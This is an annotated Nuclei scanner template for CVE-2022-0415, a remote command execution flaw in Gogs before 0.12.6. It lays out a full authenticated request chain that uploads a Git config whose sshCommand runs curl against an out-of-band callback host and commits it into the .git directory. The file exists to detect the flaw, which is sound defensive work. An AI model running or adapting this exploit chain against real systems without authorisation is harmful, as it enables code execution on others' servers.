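# Nuclei template: authenticated, state-changing check for CVE-2022-0415 in
# Gogs releases before 0.12.6. The request chain logs in, creates a
# repository, uploads a file named "config" and commits it with
# tree_path=/.git/; the uploaded Git config carries an sshCommand entry that
# calls back to an interactsh host, and that callback is what the matchers
# look for.
id: CVE-2022-0415

info:
  name: Gogs <0.12.6 - Remote Command Execution
  author: theamanrawat
  severity: high
  # NOTE(review): "without entering necessary credentials" disagrees with
  # PR:L in cvss-metrics, the `authenticated` tag and the login request
  # below; a valid account is needed to reach the upload endpoints.
  description: |
    Gogs before 0.12.6 is susceptible to remote command execution via the uploading repository file in GitHub repository gogs/gogs. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: Fixed in version 0.12.6.
  reference:
    - https://github.com/gogs/gogs/commit/0fef3c9082269e9a4e817274942a5d7c50617284
    - https://huntr.dev/bounties/b4928cfe-4110-462f-a180-6d5673797902
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0415
    - https://github.com/bfengj/CTF
    - https://github.com/cokeBeer/go-cves
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-0415
    cwe-id: CWE-434,CWE-20
    epss-score: 0.11758
    epss-percentile: 0.95304
    cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    # Six raw requests are listed under http[0].raw below.
    max-request: 6
    vendor: gogs
    product: gogs
    shodan-query:
      - cpe:"cpe:2.3:a:gogs:gogs"
      - http.title:"sign in - gogs"
    fofa-query: title="sign in - gogs"
    google-query: intitle:"sign in - gogs"
  tags: cve,cve2022,rce,gogs,authenticated,huntr,intrusive

# {{username}} and {{password}} are not defined anywhere in this template, so
# they have to be supplied at run time. The chain changes state on the target:
# the repository created in request 4 and the file committed in request 6 are
# not removed by any later request, so the scanned instance needs clean-up
# after a run.
http:
  - raw:
      # 1. Fetch the login page. The second matcher checks this response
      #    (body_1) for the Gogs marker.
      - |
        GET /user/login HTTP/1.1
        Host: {{Hostname}}
      # 2. Log in with the operator-supplied account, sending the token
      #    captured by the `csrf` extractor.
      - |
        POST /user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
      # 3. Load the repository-creation page; presumably the response that
      #    supplies `auth_csrf` (extractors are not bound to one request).
      - |
        GET /repo/create HTTP/1.1
        Host: {{Hostname}}
      # 4. Create a repository named {{randstr}} with an initial commit.
      #    NOTE(review): user_id=1 is hard-coded; this presumably only works
      #    when the supplied account has ID 1 - confirm before relying on a
      #    negative result.
      - |
        POST /repo/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on
      # 5. Upload a file named "config" whose body is a Git config with an
      #    sshCommand entry pointing at the interactsh host. The `uuid`
      #    extractor reads the upload id from the JSON response.
      - |
        POST /{{username}}/{{randstr}}/upload-file HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-Requested-With: XMLHttpRequest
        X-Csrf-Token: {{auth_csrf}}
        Content-Type: multipart/form-data; boundary=---------------------------313811965223810628771946318395

        -----------------------------313811965223810628771946318395
        Content-Disposition: form-data; name="file"; filename="config"
        Content-Type: application/octet-stream

        [core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
        ignorecase = true
        precomposeunicode = true
        sshCommand = curl http://{{interactsh-url}} -I
        [remote "origin"]
        url = git@github.com:torvalds/linux.git
        fetch = +refs/heads/*:refs/remotes/origin/*
        [branch "master"]
        remote = origin
        merge = refs/heads/master
        -----------------------------313811965223810628771946318395--
      # 6. Commit the uploaded file with tree_path=/.git/. For log review on
      #    the server side, a POST to an `_upload` route whose tree_path
      #    points inside `.git` is the distinguishing request of this chain.
      - |
        POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=

    # Both matchers must hold: an out-of-band interaction was recorded and
    # the first response looks like a Gogs instance.
    matchers-condition: and
    matchers:
      # NOTE(review): a DNS-only interaction satisfies this matcher. The
      # callback host name travels inside the uploaded file, so anything that
      # resolves host names found in uploaded content would presumably also
      # produce a DNS hit; an http interaction is the stronger signal when
      # triaging a result.
      - type: word
        part: interactsh_protocol
        words:
          - dns
          - http

      - type: word
        part: body_1
        words:
          - content="Gogs

    # All three extractors are internal: the captured values feed later
    # requests and are not reported in the scan output.
    extractors:
      # Token from a `name="_csrf" value="..."` attribute pair.
      - type: regex
        name: csrf
        group: 1
        regex:
          - name="_csrf" value="(.*)"
        internal: true

      # Token from a `name="_csrf" content="..."` attribute pair.
      - type: regex
        name: auth_csrf
        group: 1
        regex:
          - name="_csrf" content="(.*)"
        internal: true

      # Upload id from the JSON response of request 5.
      - type: regex
        name: uuid
        group: 1
        regex:
          - ' "uuid": "(.*)"'
        internal: true
# Signature trailer from the published template. It covers the template
# content as published; after any local edit (presumably including added
# comments) treat it as stale and re-sign the template before relying on
# signature verification.
# digest: 4a0a0047304502200d8ef6d64f56736b9f4df649e0b8a901e1a6c156d7d926865321279d635f17e4022100e580aba4cadd6840a8ca15efa3aaf5afc09849320cafadf6eecbfa672db2cb58:922c64590222798bb761d5b6d8e72950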